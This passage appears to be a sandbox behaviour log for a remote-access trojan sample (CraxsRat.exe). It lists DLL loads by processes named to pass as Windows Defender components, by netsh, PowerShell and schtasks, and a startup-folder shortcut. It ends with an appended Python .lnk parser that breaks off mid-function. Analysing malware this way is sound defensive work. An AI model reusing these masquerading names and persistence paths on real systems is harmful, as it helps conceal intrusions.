Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32 Jump to behavior
Source: Windows Defender Notification.lnk.10.dr LNK file: ..\..\..\..\..\Windows Defender Notification.exe
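The shortcut above carries only a relative target, so what it launches depends on where the .lnk sits. The following is an added example, not part of the report: it parses the StringData of a shell link (MS-SHLLINK layout) and resolves RELATIVE_PATH the way Windows does, against the shortcut's own directory. The shortcut bytes are constructed here, and placing the .lnk in the user's Startup folder is an assumption drawn from the "Drops PE files to the startup folder" signature rather than from this line; the cp1252 fallback for non-Unicode strings is likewise an assumption about the system code page.

```python
"""Parse a .lnk's StringData and resolve its relative target.
Added example; the sample shortcut is constructed, not a file from the report."""
import ntpath
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_RELATIVE_PATH = 0x08
IS_UNICODE = 0x80
# StringData blocks appear in this fixed order when their flag bit is set.
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))

# Assumed location of the dropped .lnk (five '..' hops from here land in %APPDATA%).
STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields present in the shortcut."""
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
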